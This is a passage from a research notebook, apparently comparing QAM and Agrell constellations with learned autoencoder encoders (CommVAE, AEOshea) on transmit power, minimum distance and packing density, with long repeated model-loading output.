[ 128.0, 128.0, 136.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 256.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 256.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ] ])\nelse:\n raise NotImplementedError(\"Not implemented (blkSize={},chDim={})\".format(blkSize,chDim))\n\nagrell_sym_pow = np.mean(np.sum(agrell_map*agrell_map,axis=1))\nprint( \"Agrell Avg. 
Tx Power:\", agrell_sym_pow )\n\nnoisePower = agrell_sym_pow * 10.0**(-SNR_range_dB/10.0)\nn0_per_comp = noisePower/(2*chDim)", "Agrell Avg. Tx Power: 3.095200273238941\n" ] ], [ [ "### Compute Metrics", "_____no_output_____" ], [ "QAM", "_____no_output_____" ] ], [ [ "qam_map = np.array(list(map(list, product([-1, +1], repeat=blkSize))))\n\nqam_sym_pow = np.mean(np.sum(qam_map*qam_map,axis=1))\nprint( \"QAM Avg. Tx Power:\", qam_sym_pow )\n\nqam_d_min = np.unique(cdist(qam_map,qam_map))[1]\nprint(\"d_min:\", qam_d_min )\n\nqam_en = qam_sym_pow / (qam_d_min**2)\nprint(\"En:\", qam_en)", "QAM Avg. Tx Power: 4.0\nd_min: 2.0\nEn: 1.0\n" ] ], [ [ "Agrell", "_____no_output_____" ] ], [ [ "agrell_sym_pow = np.mean(np.sum(agrell_map*agrell_map,axis=1))\nprint( \"Agrell Avg. Tx Power:\", agrell_sym_pow )\n\nagrell_dmin = np.unique(cdist(agrell_map,agrell_map))[1]\nprint(\"d_min:\", agrell_dmin )\n\nagrell_en = agrell_sym_pow / (agrell_dmin**2)\nprint(\"En:\", agrell_en)", "Agrell Avg. Tx Power: 3.095200273238941\nd_min: 1.9999999999999998\nEn: 0.7738000683097355\n" ] ], [ [ "## Deep Learning Model", "_____no_output_____" ] ], [ [ "from CommVAE import CommVAE1hot\nfrom AEOshea import AEOshea1hot", "_____no_output_____" ] ], [ [ "Specify models to analyze", "_____no_output_____" ] ], [ [ "model_summary = {}\nresults = {}\n\n# if blkSize==8 and chDim==4:\n# model_summary = { \n# \"AWGN ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_awgn_64_32_16_n040_summary.dil\",\n# \"AWGN ($\\sigma_n^2=0.8$)\": \"./models_08x04/rbf_awgn_64_32_16_n080_summary.dil\",\n# \"AWGN ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_awgn_64_32_16_n120_summary.dil\",\n# \"RBF ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_rbf_64_32_16_n040_summary.dil\",\n# \"RBF ($\\sigma_n^2=0.8$)\": \"./models_08x04/rbf_rbf_64_32_16_n080_summary.dil\",\n# \"RBF ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_rbf_64_32_16_n120_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_08x04/rbf_oshea_64_32_16_04dB_summary.dil\",\n# \"Oshea 
($10dB$)\": \"./models_08x04/rbf_oshea_64_32_16_10dB_summary.dil\"\n# }\n# elif blkSize==4 and chDim==2:\n# model_summary = {\n# \"AWGN($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_awgn_64_32_16_n020_summary.dil\",\n# \"AWGN($\\sigma_n^2=0.4$)\": \"./models_04x02/rbf_awgn_64_32_16_n040_summary.dil\",\n# \"AWGN($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_awgn_64_32_16_n060_summary.dil\",\n# \"RBF($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_rbf_64_32_16_n020_summary.dil\",\n# \"RBF($\\sigma_n^2=0.4$)\": \"./models_04x02/rbf_rbf_64_32_16_n040_summary.dil\",\n# \"RBF($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_rbf_64_32_16_n060_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_04x02/rbf_oshea_64_32_16_04dB_summary.dil\",\n# \"Oshea ($10dB$)\": \"./models_04x02/rbf_oshea_64_32_16_10dB_summary.dil\"\n# }\n# elif blkSize==2 and chDim==1:\n# model_summary = {\n \n# }\n# else:\n# raise NotImplementedError(\"Not implemented (blkSize={},chDim={})\".format(blkSize,chDim))\n\nif blkSize==8 and chDim==4:\n model_summary = { \n \"[1]\": \"./models_08x04/rbf_oshea_64_32_16_10dB_summary.dil\",\n# \"AWGN ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_awgn_64_32_16_n040_summary.dil\",\n \"Proposed: Trained with (19)\": \"./models_08x04/rbf_awgn_64_32_16_n080_summary.dil\",\n# \"AWGN ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_awgn_64_32_16_n120_summary.dil\",\n# \"RBF ($\\sigma_n^2=0.4$)\": \"./models_08x04/rbf_rbf_64_32_16_n040_summary.dil\",\n \"Proposed: Trained with (23)\": \"./models_08x04/rbf_rbf_64_32_16_n080_summary.dil\",\n# \"RBF ($\\sigma_n^2=1.2$)\": \"./models_08x04/rbf_rbf_64_32_16_n120_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_08x04/rbf_oshea_64_32_16_04dB_summary.dil\",\n }\nelif blkSize==4 and chDim==2:\n model_summary = {\n \"[1]\": \"./models_04x02/rbf_oshea_64_32_16_10dB_summary.dil\",\n# \"AWGN($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_awgn_64_32_16_n020_summary.dil\",\n \"Proposed: Trained with (19)\": \"./models_04x02/rbf_awgn_64_32_16_n040_summary.dil\",\n# 
\"AWGN($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_awgn_64_32_16_n060_summary.dil\",\n# \"RBF($\\sigma_n^2=0.2$)\": \"./models_04x02/rbf_rbf_64_32_16_n020_summary.dil\",\n \"Proposed: Trained with (23)\": \"./models_04x02/rbf_rbf_64_32_16_n040_summary.dil\",\n# \"RBF($\\sigma_n^2=0.6$)\": \"./models_04x02/rbf_rbf_64_32_16_n060_summary.dil\",\n# \"Oshea ($4dB$)\": \"./models_04x02/rbf_oshea_64_32_16_04dB_summary.dil\",\n }\nelif blkSize==2 and chDim==1:\n model_summary = {\n \"[1]\": \"./models_02x01/rbf_oshea_64_32_16_10dB_summary.dil\",\n \"Proposed: Trained with (19)\": \"./models_02x01/rbf_awgn_64_32_16_n020_summary.dil\",\n \"Proposed: Trained with (23)\": \"./models_02x01/rbf_rbf_64_32_16_n020_summary.dil\",\n }\nelse:\n raise NotImplementedError(\"Not implemented (blkSize={},chDim={})\".format(blkSize,chDim))", "_____no_output_____" ] ], [ [ "For each of the model, compute $E_n$", "_____no_output_____" ] ], [ [ "for (model_exp,summary_file) in model_summary.items():\n summary_data = {}\n file_prefix = None\n # Load file\n results[model_exp] = {}\n with open(summary_file, \"rb\") as file:\n file_prefix = summary_file.split(\"_summary.dil\")[0]\n summary_data = dill.load(file)\n for (modelid,(sym_pow,bler)) in summary_data.items():\n config_file = file_prefix + \"_\" + modelid + \".dil\"\n config = {}\n model = None\n with open(config_file, \"rb\") as cfg_file:\n config = dill.load(cfg_file)\n if 'obj_fn' in config: # obj_fn is there only for proposed CommVAE\n print(config_file, \" CommVAE\")\n model = CommVAE1hot()\n else:\n print(config_file, \" AEOshea\")\n model = AEOshea1hot()\n model.load_model(file_prefix+\"_\"+modelid)\n # Compute the Tx power and packing density\n dl_map = model.encode(one_hot_code)\n dl_sym_pow = np.mean(np.sum(dl_map*dl_map,axis=1))\n dl_d_min = np.unique(cdist(dl_map,dl_map))[1]\n dl_en = dl_sym_pow / (dl_d_min**2)\n print(\"sym_pow:\", sym_pow, \" Model: \", dl_sym_pow, dl_d_min, dl_en, \" Pilots :\", model.pilot_sym)\n 
assert(np.abs(sym_pow-dl_sym_pow)<1e-3) # To make sure that we loaded right weights to model\n # save the results\n results[model_exp][modelid] = dl_en\n # Clear Session and Model\n K.clear_session()\n del model", "./models_04x02/rbf_oshea_64_32_16_10dB_20190321021005.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0103226 Model: 4.0103226 1.8678458098603916 1.1494689954849178 Pilots : [1.00128949 1.00128949]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321021421.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.021494 Model: 4.021494 1.8041060599938958 1.2355584207892663 Pilots : [1.00268314 1.00268314]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321021835.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.016215 Model: 4.016215 1.8169302776635188 1.2165792730256213 Pilots : [1.00202481 1.00202481]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321022254.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0436974 Model: 4.0436974 1.8158547090988673 1.2263556913828362 Pilots : [1.00544733 1.00544733]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321022708.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.037722 Model: 4.037722 1.8163475654818217 1.2238790867622538 Pilots : [1.0047042 1.0047042]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321023126.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0043936 Model: 4.0043936 1.6767967212559638 1.4242162083206868 Pilots : [1.00054905 1.00054905]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321023536.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.022528 Model: 4.022528 1.8179753991717387 1.2170911100196704 Pilots : [1.00281207 1.00281207]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321023958.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.998302 Model: 3.998302 1.8599051654851653 1.155830076106752 Pilots : [0.99978773 0.99978773]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321024417.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0069776 Model: 4.0069776 1.8187605234264208 1.2113394792581473 Pilots : [1.00087181 1.00087181]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321024836.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025809 Model: 4.025809 1.8577280624361094 1.1665110660072782 Pilots : [1.00322091 1.00322091]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321025251.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0178227 Model: 4.0178227 1.7773294244121154 1.271905692306294 Pilots : [1.00222537 1.00222537]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321025709.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0080333 Model: 4.0080333 1.8589615323771391 1.15981978382771 Pilots : [1.00100366 1.00100366]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321030125.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0354357 Model: 4.0354357 1.802239819623082 1.2424109409253115 Pilots : [1.00441969 1.00441969]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321030542.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.013639 Model: 4.013639 1.7452961312609632 1.3176499598379294 Pilots : [1.00170342 1.00170342]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321030959.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0059853 Model: 4.0059853 1.7897968431852231 1.250552335088266 Pilots : [1.00074788 1.00074788]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321031413.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0025835 Model: 4.0025835 1.8177553921258718 1.2113496494030294 Pilots : [1.00032289 1.00032289]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321031827.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025197 Model: 4.025197 1.8098278952652804 1.228888804969346 Pilots : [1.00314468 1.00314468]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321032241.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015998 Model: 4.015998 1.8424927124334518 1.1829923005113445 Pilots : [1.00199774 1.00199774]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321032658.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0335927 Model: 4.0335927 1.837315018256809 1.19488137716802 Pilots : [1.00419031 1.00419031]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321033123.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0236454 Model: 4.0236454 1.8817750977909322 1.1362771302777601 Pilots : [1.00295132 1.00295132]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321033550.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025368 Model: 4.025368 1.8257097577806654 1.2076529301285024 Pilots : [1.00316601 1.00316601]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321034014.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015984 Model: 4.015984 1.8485696821243314 1.1752231239952582 Pilots : [1.00199602 1.00199602]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321034434.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0286736 Model: 4.0286736 1.8802292633889484 1.1395685961491018 Pilots : [1.00357781 1.00357781]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321034852.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.016572 Model: 4.016572 1.8505565310519945 1.172872606933723 Pilots : [1.00206936 1.00206936]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321035311.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.029778 Model: 4.029778 1.79253540488781 1.254138896146422 Pilots : [1.00371535 1.00371535]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321035725.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0006537 Model: 4.0006537 1.8324186104585374 1.1914657895805842 Pilots : [1.00008171 1.00008171]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321040145.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.017698 Model: 4.017698 1.8131303019091949 1.2221351532092075 Pilots : [1.00220978 1.00220978]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321040617.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0152607 Model: 4.0152607 1.7981845895769277 1.241781555338424 Pilots : [1.00190577 1.00190577]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321041055.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.024841 Model: 4.024841 1.7967098197282765 1.2467886137013293 Pilots : [1.0031003 1.0031003]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321041522.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0088215 Model: 4.0088215 1.9041017330576435 1.1056977375281305 Pilots : [1.00110208 1.00110208]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321041952.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0130568 Model: 4.0130568 1.9137692211982515 1.0957113758453254 Pilots : [1.00163076 1.00163076]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321042414.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0274296 Model: 4.0274296 1.8808260051124779 1.1384939149969364 Pilots : [1.00342284 1.00342284]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321042834.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.037004 Model: 4.037004 1.826254666912332 1.2104211442277624 Pilots : [1.00461485 1.00461485]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321043255.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015849 Model: 4.015849 1.8623728783847342 1.1578281652405333 Pilots : [1.00197918 1.00197918]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321043723.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.017791 Model: 4.017791 1.8336122551154663 1.1950121296036216 Pilots : [1.00222138 1.00222138]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321044153.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0191555 Model: 4.0191555 1.8771560283731916 1.1406018312857202 Pilots : [1.00239158 1.00239158]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321044620.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0150876 Model: 4.0150876 1.8484147566522977 1.175157756644391 Pilots : [1.00188418 1.00188418]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321045059.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.010682 Model: 4.010682 1.860494457729058 1.1586745799219327 Pilots : [1.00133437 1.00133437]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321045520.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.03608 Model: 4.03608 1.872790937647868 1.1507504543597944 Pilots : [1.00449986 1.00449986]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321045959.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0150013 Model: 4.0150013 1.8476675980271335 1.1760830864806404 Pilots : [1.00187341 1.00187341]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321050428.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.004919 Model: 4.004919 1.8287811030791414 1.1974855776634943 Pilots : [1.00061469 1.00061469]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321050857.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.028403 Model: 4.028403 1.819831677687323 1.216383299318762 Pilots : [1.00354407 1.00354407]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321051319.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.9969583 Model: 3.9969583 1.7860125628941141 1.253027474606826 Pilots : [0.99961971 0.99961971]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321051744.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0231276 Model: 4.0231276 1.8803013977731322 1.1379124905911964 Pilots : [1.00288678 1.00288678]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321052207.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0188003 Model: 4.0188003 1.8711587175777078 1.147823645141683 Pilots : [1.00234728 1.00234728]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321052629.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0165615 Model: 4.0165615 1.8674855440391889 1.151701479157991 Pilots : [1.00206805 1.00206805]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321053053.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0150166 Model: 4.0150166 1.8604124477032609 1.1600290552495218 Pilots : [1.00187531 1.00187531]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321053514.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0086045 Model: 4.0086045 1.8443813119354509 1.178397429051123 Pilots : [1.00107499 1.00107499]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321053939.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0225 Model: 4.0225 1.8103210577984237 1.2273964151394758 Pilots : [1.00280856 1.00280856]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321054404.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.035507 Model: 4.035507 1.8886372298065395 1.1313605571663794 Pilots : [1.00442859 1.00442859]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321054824.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0148287 Model: 4.0148287 1.8202446368644765 1.2117345689606214 Pilots : [1.00185187 1.00185187]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321055244.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.9943185 Model: 3.9943185 1.8545530872059357 1.161352745218874 Pilots : [0.99928956 0.99928956]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321055711.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0013404 Model: 4.0013404 1.8845215850248629 1.1266869538290092 Pilots : [1.00016753 1.00016753]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321060131.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.015752 Model: 4.015752 1.7959352808969267 1.245046301435316 Pilots : [1.00196705 1.00196705]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321060550.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
